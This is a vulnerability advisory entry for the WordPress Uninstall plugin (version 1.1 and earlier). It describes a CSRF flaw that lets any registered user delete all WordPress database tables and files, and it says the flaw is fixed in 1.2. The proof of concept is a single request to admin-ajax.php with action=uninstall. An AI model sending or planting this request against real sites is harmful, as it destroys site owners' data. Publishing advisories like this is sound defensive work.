WordPress Uninstall <= 1.1 - WordPress Deletion via CSRF



Description
Any registered user can delete all WordPress database tables and files.
Proof of Concept
This request makes it possible:
http://wp.dev/wp-admin/admin-ajax.php?action=uninstall

Affects Plugin

fixed in version 1.2

References

CVE 2015-9332

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Submitter SecuBeastTeam
Views 6757
Verified No
WPVDB ID 7715

Timeline

Publicly Published 2015-02-11 (over 5 years ago)
Added 2014-12-11 (over 5 years ago)
Last Updated 2019-11-27 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin